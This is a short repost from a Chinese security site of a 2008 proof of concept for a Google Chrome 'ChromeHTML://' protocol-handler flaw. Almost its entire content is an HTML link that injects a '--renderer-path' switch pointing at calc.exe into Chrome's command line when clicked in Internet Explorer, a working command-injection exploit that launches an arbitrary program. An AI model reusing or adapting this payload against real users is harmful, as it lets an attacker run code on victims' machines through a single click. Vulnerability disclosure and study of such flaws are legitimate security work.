Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
|
来源:http://retrogod.altervista.org 作者:strawdog 发布时间:2008-12-24
|
|
<!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|